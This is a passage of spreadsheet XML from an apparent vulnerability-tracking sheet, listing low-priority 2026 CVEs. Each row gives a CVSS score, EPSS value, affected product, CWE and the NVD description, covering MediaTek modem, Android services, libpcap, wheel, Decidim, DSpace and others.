        <v>5.5</v>
      </c>
      <c r="D4587" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4587" s="5" t="inlineStr"/>
      <c r="F4587" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4587" s="5" t="inlineStr"/>
      <c r="H4587" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2716, mediatek:mt2716_firmware, mediatek:mt6835, mediatek:mt6835_firmware, mediatek:mt6858, mediatek:mt6858_firmware, mediatek:mt6878, mediatek:mt6878_firmware, mediatek:mt6881, mediatek:mt6881_firmware</t>
        </is>
      </c>
      <c r="I4587" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4587" s="5" t="inlineStr"/>
      <c r="K4587" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4587" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01810811; Issue ID: MSV-9232.</t>
        </is>
      </c>
      <c r="M4587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20500</t>
        </is>
      </c>
    </row>
    <row r="4588">
      <c r="A4588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20515</t>
        </is>
      </c>
      <c r="C4588" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4588" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4588" s="5" t="inlineStr"/>
      <c r="F4588" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4588" s="5" t="inlineStr"/>
      <c r="H4588" s="5" t="inlineStr"/>
      <c r="I4588" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4588" s="5" t="inlineStr"/>
      <c r="K4588" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4588" s="5" t="inlineStr">
        <is>
          <t>In gpu, there is a possible system crash due to use after free. This could lead to local information disclosure with User execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS11122991; Issue ID: MSV-8132.</t>
        </is>
      </c>
      <c r="M4588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20515</t>
        </is>
      </c>
    </row>
    <row r="4589">
      <c r="A4589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20516</t>
        </is>
      </c>
      <c r="C4589" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4589" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4589" s="5" t="inlineStr"/>
      <c r="F4589" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4589" s="5" t="inlineStr"/>
      <c r="H4589" s="5" t="inlineStr"/>
      <c r="I4589" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4589" s="5" t="inlineStr"/>
      <c r="K4589" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L4589" s="5" t="inlineStr">
        <is>
          <t>In MiracastService, there is a possible escalation of privilege due to a confused deputy. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11060069 / DTV04881615; Issue ID: MSV-7882.</t>
        </is>
      </c>
      <c r="M4589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20516</t>
        </is>
      </c>
    </row>
    <row r="4590">
      <c r="A4590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24049</t>
        </is>
      </c>
      <c r="C4590" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4590" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4590" s="5" t="inlineStr"/>
      <c r="F4590" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4590" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4590" s="5" t="inlineStr">
        <is>
          <t>wheel_project:wheel</t>
        </is>
      </c>
      <c r="I4590" s="5" t="inlineStr">
        <is>
          <t>2026-01-22</t>
        </is>
      </c>
      <c r="J4590" s="5" t="inlineStr"/>
      <c r="K4590" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-732</t>
        </is>
      </c>
      <c r="L4590" s="5" t="inlineStr">
        <is>
          <t>wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.</t>
        </is>
      </c>
      <c r="M4590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24049</t>
        </is>
      </c>
    </row>
    <row r="4591">
      <c r="A4591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28584</t>
        </is>
      </c>
      <c r="C4591" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4591" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4591" s="5" t="inlineStr"/>
      <c r="F4591" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4591" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4591" s="5" t="inlineStr"/>
      <c r="I4591" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4591" s="5" t="inlineStr"/>
      <c r="K4591" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L4591" s="5" t="inlineStr">
        <is>
          <t>In createSessionInternal of PackageInstallerService.java, there is a possible way to permanently DoS the device due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M4591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28584</t>
        </is>
      </c>
    </row>
    <row r="4592">
      <c r="A4592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28596</t>
        </is>
      </c>
      <c r="C4592" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4592" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4592" s="5" t="inlineStr"/>
      <c r="F4592" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4592" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4592" s="5" t="inlineStr"/>
      <c r="I4592" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4592" s="5" t="inlineStr"/>
      <c r="K4592" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4592" s="5" t="inlineStr">
        <is>
          <t>In parseInterventionFromXml of GameManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M4592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28596</t>
        </is>
      </c>
    </row>
    <row r="4593">
      <c r="A4593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28617</t>
        </is>
      </c>
      <c r="C4593" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4593" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4593" s="5" t="inlineStr"/>
      <c r="F4593" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4593" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4593" s="5" t="inlineStr"/>
      <c r="I4593" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4593" s="5" t="inlineStr"/>
      <c r="K4593" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4593" s="5" t="inlineStr">
        <is>
          <t>In add of WifiNetworkSuggestionsManager.java, there is a possible persistent DOS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M4593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28617</t>
        </is>
      </c>
    </row>
    <row r="4594">
      <c r="A4594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28633</t>
        </is>
      </c>
      <c r="C4594" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4594" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4594" s="5" t="inlineStr"/>
      <c r="F4594" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4594" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4594" s="5" t="inlineStr"/>
      <c r="I4594" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4594" s="5" t="inlineStr"/>
      <c r="K4594" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4594" s="5" t="inlineStr">
        <is>
          <t>In initForUserNoTracing of VoiceInteractionManagerService.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M4594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28633</t>
        </is>
      </c>
    </row>
    <row r="4595">
      <c r="A4595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31911</t>
        </is>
      </c>
      <c r="C4595" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4595" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4595" s="5" t="inlineStr"/>
      <c r="F4595" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4595" s="5" t="inlineStr"/>
      <c r="H4595" s="5" t="inlineStr"/>
      <c r="I4595" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4595" s="5" t="inlineStr"/>
      <c r="K4595" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L4595" s="5" t="inlineStr">
        <is>
          <t>libpcap BPF interpreter calls abort() if it encounters a BPF instruction that has an invalid opcode.  In particular uncommon use cases a crafted filter program can terminate the OS process.</t>
        </is>
      </c>
      <c r="M4595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31911</t>
        </is>
      </c>
    </row>
    <row r="4596">
      <c r="A4596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31912</t>
        </is>
      </c>
      <c r="C4596" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4596" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4596" s="5" t="inlineStr"/>
      <c r="F4596" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4596" s="5" t="inlineStr"/>
      <c r="H4596" s="5" t="inlineStr"/>
      <c r="I4596" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4596" s="5" t="inlineStr"/>
      <c r="K4596" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-1285, CWE-823</t>
        </is>
      </c>
      <c r="L4596" s="5" t="inlineStr">
        <is>
          <t>libpcap BPF interpreter detects neither reaching the end of the filter program buffer due to lack of a return instruction nor executing a jump instruction with an offset that translates to a pointer outside of the buffer.  In particular uncommon use cases a crafted filter program can cause the interpreter to try reading the OS process memory in the 32GiB around the buffer on 64-bit architectures and in the entire address space on 32-bit architectures.</t>
        </is>
      </c>
      <c r="M4596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31912</t>
        </is>
      </c>
    </row>
    <row r="4597">
      <c r="A4597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32591</t>
        </is>
      </c>
      <c r="C4597" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4597" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4597" s="5" t="inlineStr"/>
      <c r="F4597" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4597" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H4597" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I4597" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J4597" s="5" t="inlineStr"/>
      <c r="K4597" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4597" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's Proxy Cache configuration feature. When an organization administrator configures an upstream registry for proxy caching, Quay makes a network connection to the specified registry hostname without verifying that it points to a legitimate external service. An attacker with organization administrator privileges could supply a crafted hostname to force the Quay server to make requests to internal network services, cloud infrastructure endpoints, or other resources that should not be accessible from the Quay application.</t>
        </is>
      </c>
      <c r="M4597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32591</t>
        </is>
      </c>
    </row>
    <row r="4598">
      <c r="A4598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39020</t>
        </is>
      </c>
      <c r="C4598" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4598" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4598" s="5" t="inlineStr"/>
      <c r="F4598" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4598" s="5" t="inlineStr"/>
      <c r="H4598" s="5" t="inlineStr"/>
      <c r="I4598" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4598" s="5" t="inlineStr"/>
      <c r="K4598" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4598" s="5" t="inlineStr">
        <is>
          <t>An issue in WIngs3D v.2.4.1 allows a local attacker to cause a denial of service via a crafted Wavefront OBJ file</t>
        </is>
      </c>
      <c r="M4598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39020</t>
        </is>
      </c>
    </row>
    <row r="4599">
      <c r="A4599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45376</t>
        </is>
      </c>
      <c r="C4599" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4599" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4599" s="5" t="inlineStr"/>
      <c r="F4599" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4599" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H4599" s="5" t="inlineStr"/>
      <c r="I4599" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4599" s="5" t="inlineStr"/>
      <c r="K4599" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L4599" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, the GET /admin/organization/users search interpolates params[:term] into raw Arel.sql ORDER BY similarity expressions before sanitization, allowing an authenticated organization administrator to execute blind PostgreSQL expressions and infer data through timing differences. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M4599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45376</t>
        </is>
      </c>
    </row>
    <row r="4600">
      <c r="A4600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48790</t>
        </is>
      </c>
      <c r="C4600" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4600" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4600" s="5" t="inlineStr"/>
      <c r="F4600" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4600" s="5" t="inlineStr"/>
      <c r="H4600" s="5" t="inlineStr"/>
      <c r="I4600" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4600" s="5" t="inlineStr"/>
      <c r="K4600" s="5" t="inlineStr">
        <is>
          <t>CWE-276, CWE-732</t>
        </is>
      </c>
      <c r="L4600" s="5" t="inlineStr">
        <is>
          <t>Turso CLI is the command line interface (CLI) to the open-source database Turso. Versions prior to 1.0.26 persist the user's Turso platform JWT to `settings.json` using Viper's default `configPermissions` of `0o644`, leaving the credential file world-readable on standard Linux and macOS systems. Any other local UID on the host can read the file and recover the platform JWT, which grants full Turso platform access scoped to the user's organizations. Version 1.0.26 patches the issue.</t>
        </is>
      </c>
      <c r="M4600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48790</t>
        </is>
      </c>
    </row>
    <row r="4601">
      <c r="A4601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4897</t>
        </is>
      </c>
      <c r="C4601" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4601" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4601" s="5" t="inlineStr"/>
      <c r="F4601" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4601" s="5" t="inlineStr"/>
      <c r="H4601" s="5" t="inlineStr">
        <is>
          <t>freedesktop:polkit, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I4601" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J4601" s="5" t="inlineStr"/>
      <c r="K4601" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4601" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in polkit. A local user can exploit this by providing a specially crafted, excessively long input to the `polkit-agent-helper-1` setuid binary via standard input (stdin). This unbounded input can lead to an out-of-memory (OOM) condition, resulting in a Denial of Service (DoS) for the system.</t>
        </is>
      </c>
      <c r="M4601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4897</t>
        </is>
      </c>
    </row>
    <row r="4602">
      <c r="A4602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49313</t>
        </is>
      </c>
      <c r="C4602" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4602" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4602" s="5" t="inlineStr"/>
      <c r="F4602" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4602" s="5" t="inlineStr"/>
      <c r="H4602" s="5" t="inlineStr"/>
      <c r="I4602" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4602" s="5" t="inlineStr"/>
      <c r="K4602" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L4602" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the app lock module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="M4602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49313</t>
        </is>
      </c>
    </row>
    <row r="4603">
      <c r="A4603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49831</t>
        </is>
      </c>
      <c r="C4603" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4603" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4603" s="5" t="inlineStr"/>
      <c r="F4603" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4603" s="5" t="inlineStr">
        <is>
          <t>tomcat</t>
        </is>
      </c>
      <c r="H4603" s="5" t="inlineStr"/>
      <c r="I4603" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4603" s="5" t="inlineStr"/>
      <c r="K4603" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4603" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. Prior to versions 7.6.7, 8.4, 9.3, and 10.0, the Curation Task feature allows an output path to be used by the reporter (-r parameter), typically used to stream results and status of curation task operations. It is not restricted to any particular base path, meaning that any path writable by the DSpace (often 'tomcat') user is allowed. This constitutes a Path Traversal Vulnerability in the curate script. This issue has been patched in versions 7.6.7, 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="M4603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49831</t>
        </is>
      </c>
    </row>
    <row r="4604">
      <c r="A4604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49833</t>
        </is>
      </c>
      <c r="C4604" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4604" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4604" s="5" t="inlineStr"/>
      <c r="F4604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4604" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H4604" s="5" t="inlineStr"/>
      <c r="I4604" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4604" s="5" t="inlineStr"/>
      <c r="K4604" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4604" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. From versions 8.0-rc1 to before 8.4, 9.0-rc1 to before 9.3, and 10-rc1 to before 10.0, a path traversal vulnerability is possible via the COAR Notify / LDN service in DSpace. The attacker MUST already have DSpace administrator credentials in order to perform the attack. When reading a file input stream of an "inbound pattern" / "template", used to generate an LDN message, the LDN class does not check for path traversal or restrict the templates to a known base path. This could allow an untrusted file from elsewhere in the file system (e.g. an export log, a bitstream path, a temporary file) to be read and interpreted as an Apache Velocity template. This issue has been patched in versions 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="M4604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49833</t>
        </is>
      </c>
    </row>
    <row r="4605">
      <c r="A4605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52772</t>
        </is>
      </c>
      <c r="C4605" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4605" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4605" s="5" t="inlineStr"/>
      <c r="F4605" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4605" s="5" t="inlineStr"/>
      <c r="H4605" s="5" t="inlineStr"/>
      <c r="I4605" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4605" s="5" t="inlineStr"/>
      <c r="K4605" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L4605" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, Bazar form-field templates still apply |raw('html') to field.label / field.hint in attribute and label-body contexts, resulting stored XSS in form renders. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M4605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52772</t>
        </is>
      </c>
    </row>
    <row r="4606">
      <c r="A4606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52857</t>
        </is>
      </c>
      <c r="C4606" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4606" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4606" s="5" t="inlineStr"/>
      <c r="F4606" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4606" s="5" t="inlineStr"/>
      <c r="H4606" s="5" t="inlineStr"/>
      <c r="I4606" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4606" s="5" t="inlineStr"/>
      <c r="K4606" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4606" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to 1.13.0, unbounded json, yaml, and xml configuration-file parsers in parser.go can process an oversized non-file parser configuration file and exhaust Wings process memory. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="M4606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52857</t>
        </is>
      </c>
    </row>
    <row r="4607">
      <c r="A4607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54422</t>
        </is>
      </c>
      <c r="C4607" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4607" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4607" s="5" t="inlineStr"/>
      <c r="F4607" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4607" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4607" s="5" t="inlineStr"/>
      <c r="I4607" s="5" t="inlineStr">
        <is>
          <t>2026-07-24</t>
        </is>
      </c>
      <c r="J4607" s="5" t="inlineStr"/>
      <c r="K4607" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L4607" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Ironic Python Agent through 11.5.0, a malicious bootc container, when deployed using ironic-python-agent, may be able to extract the credentials used to download it.</t>
        </is>
      </c>
      <c r="M4607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54422</t>
        </is>
      </c>
    </row>
    <row r="4608">
      <c r="A4608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54611</t>
        </is>
      </c>
      <c r="C4608" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4608" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4608" s="5" t="inlineStr"/>
      <c r="F4608" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4608" s="5" t="inlineStr"/>
      <c r="H4608" s="5" t="inlineStr"/>
      <c r="I4608" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4608" s="5" t="inlineStr"/>
      <c r="K4608" s="5" t="inlineStr">
        <is>
